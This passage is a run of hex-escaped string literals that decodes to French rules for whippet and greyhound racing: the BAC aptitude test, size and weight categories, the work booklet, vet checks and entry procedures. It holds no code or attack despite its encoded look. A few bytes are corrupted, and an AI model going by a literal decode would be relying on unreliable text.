-"\x6f\x69\x6e\x73\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20" -"\x6c\x27\x61\x76\x61\x6e\x63\x65\x2e\x20\x44\xe8\x73\x20\x71\x75" -"\x65\x20\x6c\x61\x20\x64\x61\x74\x65\x20\x65\x73\x74\x20\x66\x69" -"\x78\xe9\x65\x2c\x20\x76\x6f\x75\x73\x20\x76\x65\x6e\x65\x7a\x20" -"\x61\x76\x65\x63\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x72\x6e\x65" -"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x6c\x61" -"\x20\x70\x68\x6f\x74\x6f\x63\x6f\x70\x69\x65\x20\x64\x75\x20\x70" -"\x65\x64\x69\x67\x72\x65\x65\x20\x65\x74\x20\x6c\x61\x20\x63\x61" -"\x72\x74\x65\x20\x64\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e" -"\x0d\x53\x65\x75\x6c\x20\x6c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65" -"\x72\x73\x20\x63\x6f\x6e\x66\x69\x72\x6d\xe9\x73\x2c\x20\x64\x6f" -"\x6e\x63\x20\x64\x6f\x74\xe9\x73\x20\x64\x27\x75\x6e\x20\x70\x65" -"\x64\x69\x67\x72\x65\x65\x20\x64\xe9\x66\x69\x6e\x69\x74\x69\x66" -"\x2c\x20\x73\x6f\x6e\x74\x20\x61\x75\x74\x6f\x72\x69\x73\xe9\x73" -"\x20\xe0\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x42\x41\x43" -"\x2e\x0d\x44\x61\x6e\x73\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20" 
-"\x63\x61\x73\x2c\x20\x6f\x6e\x20\x70\x65\x75\x74\x20\x61\x63\x63" -"\x65\x70\x74\x65\x72\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72" -"\x20\x62\x69\x65\x6e\x20\x71\x75\x65\x20\x6c\x65\x20\x20\x70\x65" -"\x64\x69\x67\x72\x65\x65\x20\x6e\x65\x20\x73\x6f\x69\x74\x20\x70" -"\xa3\x73\x20\x61\x72\x72\x69\x76\xe9\x2c\x20\x6d\x61\x69\x73\x20" -"\x6c\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x6e\x65" -"\x20\x73\x65\x72\x6f\x6e\x74\x20\x70\x61\x73\x20\x64\xe9\x6c\x69" -"\x76\x72\xe9\x73\x20\x61\x76\x61\x6e\x74\x20\x72\xe9\x63\x65\x70" -"\x74\x69\x6f\x6e\x20\x64\x75\x20\x70\x65\x64\x69\x67\x72\x65\x65" -"\x2e\x20\x4c\x65\x73\x20\x42\x41\x43\x20\x6e\x65\x20\x70\x65\x75" -"\x76\x65\x6e\x74\x20\x70\x61\x73\x20\xea\x74\x72\x65\x20\x70\x61" -"\x73\x73\xe9\x73\x20\x75\x6e\x20\x6a\x6f\x75\x72\x20\x64\x65\x20" -"\x63\x6f\x75\x72\x73\x65\x2c\x20\x73\x61\x75\x66\x20\x65\x78\x63" -"\x65\x70\x74\x69\x6f\x6e\x73\x20\x70\x72\xe9\x76\x75\x65\x73\x20" -"\x61\x75\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x32" -"\x29\x20\x4c\x27\x65\x78\x70\x65\x72\x74\x2d\x71\x75\x61\x6c\x69" -"\x66\x69\x63\x61\x74\x65\x75\x72\x20\x28\x45\x51\x29\x20\x63\x6f" -"\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x70\x61\x70\x69\x65" -"\x72\x73\x2c\x20\x6c\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e" -"\x0d\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x57\x68\x69\x70\x70\x65" -"\x74\x73\x2c\x20\x69\x6c\x20\x70\xe8\x73\x65\x20\x6c\x65\x20\x63" -"\x68\x69\x65\x6e\x2c\x20\x70\x75\x69\x73\x20\x70\x72\x65\x6e\x64" -"\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x61\x75\x20\x67\x61\x72" -"\x72\x6f\x74\x20\x70\x6f\x75\x72\x20\x72\x65\x74\x65\x6e\x69\x72" -"\x20\x63\x65\x6c\x6c\x65\x20\x64\x75\x20\x6d\x69\x6c\x69\x65\x75" -"\x2c\x20\x6c\x61\x20\x6d\xe9\x64\x69\x61\x6e\x65\x2e\x20\x49\x6c" -"\x20\x70\x65\x75\x74\x20\x61\x75\x73\x73\x69\x20\x66\x61\x69\x72" -"\x65\x20\x70\x61\x73\x73\x65\x72\x20\x6c\x65\x20\x57\x68\x69\x70" -"\x70\x65\x74\x20\x73\x6f\x75\x73\x20\x75\x6e\x20\x67\x61\x62\x61" 
-"\x72\x69\x74\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x2e\x0d\x54\x61" -"\x69\x6c\x6c\x65\x20\x26\x20\x70\x6f\x69\x64\x73\x20\x64\xe9\x74" -"\x65\x72\x6d\x69\x6e\x65\x6e\x74\x20\x6c\x61\x20\x63\x61\x74\xe9" -"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x66\x6f\x72\x6d\x61\x74\x20" -"\x28\x70\x65\x74\x69\x74\x73\x20\x6f\x75\x20\x57\x2c\x20\x20\x67" -"\x72\x61\x6e\x64\x73\x20\x20\x6f\x75\x20\x47\x57\x2c\x20\x74\x72" -"\xe8\x73\x20\x67\x72\x61\x6e\x64\x73\x20\x6f\x75\x20\x54\x47\x57" -"\x29\x2e\x20\x4c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x75" -"\x6c\x74\xe9\x72\x69\x65\x75\x72\x65\x73\x20\x72\x61\x73\x73\x65" -"\x6d\x62\x6c\x65\x72\x6f\x6e\x74\x20\x64\x65\x73\x20\x63\x6f\x6e" -"\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x6d\xea\x6d\x65" -"\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x64\x61\x6e\x73\x20" -"\x63\x68\x61\x71\x75\x65\x20\x73\x65\x78\x65\x2e\x20\x41\x70\x72" -"\xe8\x73\x20\x6c\x27\xe2\x67\x65\x20\x64\x65\x20\x32\x20\x61\x6e" -"\x73\x2c\x20\x75\x6e\x20\x64\x65\x75\x78\x69\xe8\x6d\x65\x20\x63" -"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x73\x65\x72\x61\x20\x6f\x62\x6c" -"\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x20\x45\x6e\x20\x65\x66\x66" -"\x65\x74\x20\x6c\x65\x20\x6d\x65\x73\x75\x72\x61\x67\x65\x20\x64" -"\x65\x20\x6c\x61\x20\x74\x61\x69\x6c\x6c\x65\x20\x65\x73\x74\x20" -"\x64\xe9\x6c\x69\x63\x61\x74\x20\x65\x6e\x20\x66\x6f\x6e\x63\x74" -"\x69\x6f\x6e\x20\x64\x65\x20\x6c\x61\x20\x70\x6f\x73\x69\x74\x69" -"\x6f\x6e\x20\x64\x75\x20\x63\x68\x69\x65\x6e\x2e\x20\x49\x6c\x20" -"\x79\x20\x61\x20\x66\x72\xe9\x71\x75\x65\x6d\x6d\x65\x6e\x74\x20" -"\x75\x6e\x20\xe9\x63\x61\x72\x74\x20\x64\x27\x65\x6e\x76\x69\x72" -"\x6f\x6e\x20\x31\x20\x63\x6d\x20\x65\x6e\x74\x72\x65\x20\x6c\x61" -"\x20\x6d\xe9\x64\x69\x61\x6e\x65\x20\x65\x74\x20\x6c\x65\x73\x20" -"\x6d\x65\x73\x75\x72\x65\x73\x20\x65\x78\x74\x72\xea\x6d\x65\x73" -"\x2e\x20\x41\x76\x61\x6e\x74\x20\x63\x68\x61\x71\x75\x65\x20\x63" -"\x6f\x75\x72\x73\x65\x2c\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x70" 
-"\x85\x75\x74\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x72\x20\x6c\x65" -"\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x63\x68\x61\x6e\x67" -"\x65\x72\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c" -"\x20\x73\x61\x75\x66\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x63\x68" -"\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x6f\xf9\x20\x69\x6c\x20" -"\x66\x61\x69\x74\x20\x75\x6e\x20\x72\x61\x70\x70\x6f\x72\x74\x2e" -"\x0d\x4c\x65\x73\x20\x50\x65\x74\x69\x74\x73\x20\x4c\xe9\x76\x72" -"\x69\x65\x72\x73\x20\x49\x74\x61\x6c\x69\x65\x6e\x73\x20\x64\x6f" -"\x69\x76\x65\x6e\x74\x20\x61\x75\x73\x73\x69\x20\x73\x75\x62\x69" -"\x72\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x6d\x65\x6e" -"\x74\x20\x6c\x65\x73\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x65" -"\x74\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x64\x65" -"\x73\x20\x32\x20\x61\x6e\x73\x2e\x0d\x41\x75\x63\x75\x6e\x20\x6c" -"\xe9\x76\x72\x69\x65\x72\x20\x6e\x92\x65\x73\x74\x20\x61\x75\x74" -"\x6f\x72\x69\x73\xe9\x20\xe0\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69" -"\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f\x66\x66" -"\x69\x63\x69\x65\x6c\x6c\x65\x20\x73\x92\x69\x6c\x20\x64\xe9\x70" -"\x61\x73\x73\x65\x20\x6c\x65\x73\x20\x6e\x6f\x72\x6d\x65\x73\x20" -"\x64\x65\x20\x74\x61\x69\x6c\x6c\x65\x20\x6f\x75\x20\x64\x65\x20" -"\x70\x6f\x69\x64\x73\x20\x69\x6d\x70\x6f\x73\xe9\x65\x73\x20\x70" -"\x61\x72\x20\x6c\x65\x73\x20\x72\xe8\x12\x6c\x65\x6d\x65\x6e\x74" -"\x73\x2e\x0d\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x65\x73" -"\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x73\x20\x64\x65\x20" -"\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x61\x75\x78\x71\x75\x65\x6c" -"\x6c\x65\x73\x20\x76\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20" -"\x64\xe9\x66\xe9\x72\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x57\x68" -"\x69\x70\x70\x65\x74\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x50" -"\x4c\x49\x2c\x20\x6f\x75\x20\x76\x6f\x75\x73\x20\x76\x6f\x69\x72" -"\x20\x63\x6f\x6e\x76\x6f\x71\x75\xe9\x20\x63\x61\x72\x20\x69\x6c" 
-"\x20\x65\x78\x69\x73\x74\x65\x20\x75\x6e\x65\x20\x72\x65\x6c\x61" -"\x74\x69\x6f\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x65\x20\x65\x6e" -"\x74\x72\x65\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x76\x69" -"\x74\x65\x73\x73\x65\x2e\x20\x4f\x6e\x20\x6e\x65\x20\x66\x61\x69" -"\x74\x20\x70\x61\x73\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69\x72\x20" -"\x64\x65\x73\x20\x70\x6f\x69\x64\x73\x20\x70\x6c\x75\x6d\x65\x73" -"\x20\x63\x6f\x6e\x74\x72\x65\x20\x64\x65\x73\x20\x70\x6f\x69\x64" -"\x73\x20\x6c\x6f\x75\x72\x64\x73\x2e\x20\x44\x65\x70\x75\x69\x73" -"\x20\x6c\x61\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x70\x6c\x61\x63" -"\x65\x20\x64\x75\x20\x73\x79\x73\x74\xe8\x6d\x65\x20\x74\x61\x69" -"\x6c\x6c\x65\x2f\x70\x6f\x69\x64\x73\x20\x69\x6c\x20\x79\x20\x61" -"\x20\x74\x72\xe8\x73\x20\x70\x65\x75\x20\x64\x65\x20\x63\x6f\x6e" -"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x73\x20\x61\x75\x20\x6e\x69" -"\x76\x65\x61\x75\x20\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x2e\x20\x4c" -"\x27\x61\x62\x73\x65\x6e\x63\x65\x20\x64\x65\x20\x63\x6f\x6e\x74" -"\x72\xf4\x6c\x65\x73\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f" -"\x6e\x61\x75\x78\x20\x73\x6f\x75\x6c\xe8\x76\x65\x20\x70\x61\x72" -"\x20\x63\x6f\x6e\x74\x72\x65\x20\x62\x69\x65\x6e\x20\x64\x65\x73" -"\x20\x70\x6f\x6c\xe9\x6d\x69\x71\x75\x65\x73\x2e\x0d\x54\x6f\x75" -"\x73\x20\x63\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20" -"\x73\x6f\x6e\x74\x20\x70\x6f\x72\x74\xe9\x73\x20\x73\x75\x72\x20" -"\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x33\x29\x20\x4c\x65" -"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x64\x75\x20\x42\x41" -"\x43\x20\x63\x6f\x6e\x73\x69\x73\x74\x65\x6e\x74\x20\x64\x27\x61" -"\x62\x6f\x72\x64\x20\x65\x6e\x20\x75\x6e\x20\x73\x6f\x6c\x6f\x20" -"\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x65\x72\x20\x6c\x27" -"\x61\x70\x74\x69\x74\x75\x64\x65\x20\xe0\x20\x73\x75\x69\x76\x72" -"\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x61\x76\x65\x63" -"\x20\x61\x72\x64\x65\x75\x72\x2e\x20\x43\x65\x6c\x61\x20\x73\x75" 
-"\x66\x66\x69\x74\x20\x70\x6f\x75\x72\x20\x63\x65\x72\x74\x61\x69" -"\x6e\x65\x73\x20\x72\x61\x63\x65\x73\x20\xe0\x20\x66\x61\x69\x62" -"\x6c\x65\x20\x65\x66\x66\x65\x63\x74\x69\x66\x2e\x20\x4c\x65\x73" -"\x20\x57\x68\x69\x70\x70\x65\x74\x73\x20\x64\x6f\x69\x76\x65\x6e" -"\x74\x20\x66\x61\x69\x72\x65\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72" -"\x65\x2c\x20\x32\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x65\x6e\x20" -"\x67\x72\x6f\x75\x70\x65\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x73" -"\x6f\x75\x68\x61\x69\x74\x61\x62\x6c\x65\x20\x71\x75\x65\x20\x6c" -"\x65\x73\x20\x61\x63\x63\x6f\x6d\x70\x61\x67\x6e\x61\x74\x65\x75" -"\x72\x73\x20\x63\x6f\x6d\x70\x72\x65\x6e\x6e\x65\x6e\x74\x20\x64" -"\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x65\x20\x76" -"\x69\x74\x65\x73\x73\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65\x6e" -"\x74\x65\x73\x20\x70\x6f\x75\x72\x20\x65\x6e\x63\x61\x64\x72\x65" -"\x72\x20\x6c\x65\x20\x6e\xe9\x6f\x70\x68\x79\x74\x65\x2e\x20\x41" -"\x20\x63\x68\x61\x71\x75\x65\x20\x76\x69\x72\x61\x67\x65\x20\x69" -"\x6c\x20\x79\x20\x61\x20\x75\x6e\x20\x22\x6f\x62\x73\x65\x72\x76" -"\x61\x74\x65\x75\x72\x22\x2c\x20\x6d\x75\x6e\x69\x20\x64\x27\x75" -"\x6e\x65\x20\x63\x61\x72\x74\x65\x20\x61\x63\x63\x72\xe9\x64\x69" -"\x74\x69\x76\x65\x20\x64\x65\x20\x63\x6f\x6d\x70\xe9\x74\x65\x6e" -"\x63\x65\x2c\x20\x71\x75\x69\x2c\x20\x65\x6e\x20\x63\x61\x73\x20" -"\x64\x27\x69\x6e\x63\x69\x64\x65\x6e\x74\x20\x69\x6e\x66\x6f\x72" -"\x6d\x65\x20\x6c\x27\x65\x78\x70\x65\x72\x74\x2e\x0d\x53\x69\x20" -"\x74\x6f\x75\x74\x20\x73\x27\x65\x73\x74\x20\x62\x69\x65\x6e\x20" -"\x70\x61\x73\x73\xe9\x2c\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76" -"\x72\x69\x65\x72\x20\xd1\x62\x74\x69\x65\x6e\x74\x20\x73\x6f\x6e" -"\x20\x42\x41\x43\x2e\x20\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x75" -"\x6e\x20\x64\x6f\x75\x74\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20" -"\x61\x6a\x6f\x75\x72\x6e\xe9\x2c\x20\x73\x27\x69\x6c\x20\x79\x20" -"\x61\x20\x66\x61\x75\x74\x65\x20\x69\x6c\x20\x65\x73\x74\x20\x72" 
-"\x65\x66\x75\x73\xe9\x20\x65\x74\x20\x64\x65\x76\x72\x61\x20\x61" -"\x74\x74\x65\x6e\x64\x72\x65\x20\x31\x20\x6d\x6f\x69\x73\x20\x70" -"\x6f\x75\x72\x20\x73\x65\x20\x72\x65\x70\x72\xe9\x73\x65\x6e\x74" -"\x65\x72\x2e\x20\x56\x6f\x75\x73\x20\x64\x65\x76\x72\x65\x7a\x20" -"\x61\x6c\x6f\x72\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x72\x20" -"\x73\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65\x2e\x0d\x4c\x65" -"\x20\x63\x6c\x75\x62\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74" -"\x20\x61\x6c\x6f\x72\x73\x20\x75\x6e\x20\x42\x41\x43\x20\x64\x6f" -"\x6e\x74\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x73\x65\x72\x76\x65" -"\x72\x65\x7a\x20\x70\x72\xe9\x63\x69\x65\x75\x73\x65\x6d\x65\x6e" -"\x74\x20\x6c\x27\x6f\x72\x69\x67\x69\x6e\x61\x6c\x2e\x20\x49\x6c" -"\x20\x65\x73\x74\x20\x69\x6e\x73\x63\x72\x69\x74\x20\x73\x75\x72" -"\x20\x6c\x65\x73\x20\x6e\x6f\x75\x76\x65\x61\x75\x78\x20\x63\x61" -"\x72\x6e\x65\x74\x73\x2e\x0d\x4c\x65\x20\x63\x6c\x75\x62\x20\x76" -"\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\xe9\x67\x61\x6c\x65\x6d" -"\x65\x6e\x74\x20\x75\x6e\x20\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f" -"\x6c\x6f\x72\xe9\x20\x71\x75\x69\x20\x65\x73\x74\x20\x6c\x61\x20" -"\x70\x72\x65\x75\x76\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x70" -"\x61\x63\x69\x74\xe9\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20" -"\x64\x75\x20\x4c\xe9\x76\x72\x69\x65\x72\x2e\x0d\x50\x61\x72\x20" -"\x6c\x61\x20\x73\x75\x69\x74\x65\x2c\x20\x76\x6f\x74\x72\x65\x20" -"\x4c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x61\x62\x61" -"\x6e\x64\x6f\x6e\x6e\x65\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75" -"\x76\x65\x2c\x20\x6f\x75\x20\x66\x6c\x6f\x74\x74\x65\x72\x20\x65" -"\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4f\x6e\x20\x64\x69\x74" -"\x20\x71\x75\x27\x69\x6c\x20\x6d\x61\x6e\x71\x75\x65\x20\x64\x27" -"\xe9\x63\x6f\x6c\x61\x67\x65\x2c\x20\x69\x6c\x20\x6e\x27\x65\x73" -"\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x68\x61\x62\x69" -"\x74\x75\xe9\x20\xe0\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20" 
-"\x65\x6e\x20\x67\x72\x6f\x75\x70\x65\x2e\x20\x4f\x6e\x20\x69\x6e" -"\x73\x63\x72\x69\x74\x20\x53\x55\x53\x50\x20\x73\x75\x72\x20\x73" -"\x6f\x6e\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x53\x69\x20\x70\x61" -"\x72\x20\x63\x6f\x6e\x74\x72\x65\x20\x69\x6c\x20\x61\x20\x75\x6e" -"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x67\xea" -"\x6e\x61\x6e\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75" -"\x74\x72\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73" -"\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x73\x71\x75\x61" -"\x6c\x69\x66\x69\xe9\x20\x65\x74\x20\x69\x6e\x74\x65\x72\x64\x69" -"\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20\x70\x65\x6e\x64" -"\x61\x6e\x74\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x34\x20\x73" -"\x65\x6d\x61\x69\x6e\x65\x73\x2e\x20\x43\x65\x6c\x61\x20\x65\x73" -"\x74\x20\x70\x6f\x72\x74\xe9\x20\x73\x75\x72\x20\x6c\x65\x20\x63" -"\x61\x72\x6e\x65\x74\x20\x65\x74\x20\x73\x75\x72\x20\x6c\x65\x20" -"\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f\x6c\x6f\x72\xe9\x2e\x20\x0d" -"\x0d\x44\x6f\x6e\x63\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72" -"\x69\x72\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x33\x20\x64\x6f\x63" -"\x75\x6d\x65\x6e\x74\x73\x20\x3a\x0d\x20\x43\x41\x52\x4e\x45\x54" -"\x20\x2b\x20\x42\x41\x43\x20\x2b\x20\x43\x41\x52\x54\x4f\x4e\x20" -"\x43\x4f\x4c\x4f\x52\x45\x0d\x0d\x4c\x65\x20\x70\x61\x73\x73\x61" -"\x67\x65\x20\x64\x75\x20\x42\x50\x56\x20\x3a\x0d\x4c\x65\x20\x63" -"\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c" -"\x20\x65\x73\x74\x20\x64\xe0\x66\x66\xe9\x72\x65\x6e\x74\x20\x28" -"\x76\x65\x72\x74\x29\x20\x65\x74\x20\x6c\x65\x73\x20\x6d\x6f\x64" -"\x61\x6c\x69\x74\xe9\x73\x20\x64\x65\x20\x71\x75\x61\x6c\x69\x66" -"\x69\x63\x61\x74\x69\x6f\x6e\x20\x73\x6f\x6e\x74\x20\x61\x6e\x61" -"\x6c\x6f\x67\x75\x65\x73\x2c\x20\x6d\x61\x69\x73\x20\x65\x6e\x20" -"\x73\x6f\x6c\x6f\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x70\x6c" -"\x65\x2e\x0d\x56\x6f\x75\x73\x20\xea\x74\x65\x73\x20\x64\xe9\x73" 
-"\x6f\x72\x6d\x61\x69\x73\x20\x70\x72\xea\x74\x20\x70\x6f\x75\x72" -"\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9\x74\x69\x74\x69\x6f\x6e\x2e" -"\x0d\x0d\x51\x75\x65\x20\x64\x65\x76\x65\x7a\x2d\x76\x6f\x75\x73" -"\x20\x73\x61\x76\x6f\x69\x72\x20\x3f\x0d\x54\x6f\x75\x74\x65\x73" -"\x20\x6c\x65\x73\x20\xe9\x76\x65\x6e\x74\x75\x61\x6c\x69\x74\xe9" -"\x73\x20\x73\x6f\x6e\x74\x20\x64\xe9\x63\x72\x69\x74\x65\x73\x20" -"\x65\x6e\x20\x64\xe9\x74\x61\x69\x6c\x20\x64\x61\x6e\x73\x20\x6c" -"\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x64\x65\x73\x20" -"\xe9\x70\x72\x65\x75\x76\x65\x73\x2c\x20\x71\x75\x69\x20\x63\x6f" -"\x6d\x70\x72\x65\x6e\x64\x20\x6c\x65\x73\x20\x72\xe8\x67\x6c\x65" -"\x73\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x69\x76\x65" -"\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65" -"\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20\x45\x2e\x4e\x2e\x43\x2e" -"\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x69" -"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x2c\x20" -"\x20\x70\x6f\x75\x72\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x2e\x0d" -"\x4c\x65\x20\x74\x6f\x75\x74\x20\x66\x61\x69\x74\x20\x65\x6e\x76" -"\x69\x72\x6f\x6e\x20\x35\x30\x20\x70\x61\x67\x65\x73\x20\x65\x74" -"\x20\x6e\x65\x20\x70\x65\x75\x74\x20\x64\x6f\x6e\x63\x20\xea\x74" -"\x72\x65\x20\x64\x69\x66\x66\x75\x73\xe9\x20\xe0\x20\x63\x68\x61" -"\x63\x75\x6e\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20" -"\x64\x27\x61\x62\x6f\x72\x64\x20\x65\x6e\x67\x61\x67\x65\x72\x20" -"\x3a\x0d\x41\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f" -"\x75\x20\x61\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20" -"\x64\x75\x20\x63\x6c\x75\x62\x20\x20\x6f\x72\x67\x61\x6e\x69\x73" -"\x61\x74\x65\x75\x72\x2c\x20\x76\x6f\x75\x73\x20\x65\x6e\x76\x6f" -"\x79\x65\x7a\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20\x6c" -"\x27\x61\x76\x61\x6e\x63\x65\x20\x76\x6f\x74\x72\x65\x20\x65\x6e" -"\x67\x61\x67\x65\x6d\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20" 
-"\x6d\x6f\x64\xe8\x6c\x65\x20\x74\x79\x70\x65\x2c\x20\x6f\x75\x2c" -"\x20\xe0\x20\x64\xe9\x66\x61\x75\x74\x20\x73\x75\x72\x20\x70\x61" -"\x70\x69\x65\x72\x20\x6c\x69\x62\x72\x65\x20\x65\x6e\x20\x72\x65" -"\x63\x6f\x70\x69\x61\x6e\x74\x20\x6c\x65\x20\x42\x41\x43\x2e\x0d" -"\x4c\x65\x73\x20\x74\x61\x72\x69\x66\x73\x20\x73\x6f\x6e\x74\x20" -"\x66\x69\x78\xe9\x73\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x2e\x43" -"\x2e\x43\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20\x76" -"\x6f\x75\x73\x20\x70\x72\xe9\x73\x65\x6e\x74\x65\x72\x20\xe0\x20" -"\x6c\x27\x68\x65\x75\x72\x65\x20\x6f\x69\x78\xe9\x65\x20\x28\x65" -"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x39\x68\x29\x20\x70\x6f" -"\x75\x72\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x76" -"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x2c\x20\x6d\x75\x6e\x69" -"\x20\x64\x27\x75\x6e\x20\x63\x65\x72\x74\x69\x66\x69\x63\x61\x74" -"\x20\x64\x65\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20" -"\x61\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x76\x61\x6c\x69" -"\x64\x65\x2e\x20\x41\x20\x64\xe9\x66\x61\x75\x74\x2c\x20\x76\x6f" -"\x75\x73\x20\x6e\x65\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x70\x61" -"\x73\x20\x70\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x64\xe9\x70" -"\x61\x72\x74\x2e\x0d\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61" -"\x69\x72\x65\x20\x76\xe9\x72\x69\x66\x69\x65\x20\x6c\x65\x73\x20" -"\x70\x61\x70\x69\x65\x72\x73\x2c\x20\x69\x6c\x20\x63\x6f\x6e\x74" -"\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72" -"\x73\x20\x64\x65\x73\x20\x66\x65\x6d\x65\x6c\x6c\x65\x73\x2e\x0d" -"\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x20" -"\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65\x6d" -"\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72\x20" 